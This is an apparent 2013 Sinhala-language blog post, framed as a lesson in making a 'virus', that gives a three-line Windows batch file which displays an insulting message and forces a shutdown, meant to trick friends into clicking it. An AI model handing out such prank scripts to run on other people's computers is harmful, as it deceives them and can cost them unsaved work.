Thursday, January 3, 2013
Shut down වෙන virus එකක් හදමු
මේකනම් ඔයාලගේ යාලුවන්ව රවට්ටන්න පුළුවන් programe එකක් මේක click කලවිටදී computer එක shutdown වේවි .
මෙම code note pad වලට copy කරලා save කරනකොට *.bat කියල save කරන්න .
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Labels:
Virus සැදීම උගනිමු
Subscribe to:
Post Comments (Atom)





0 comments:
Post a Comment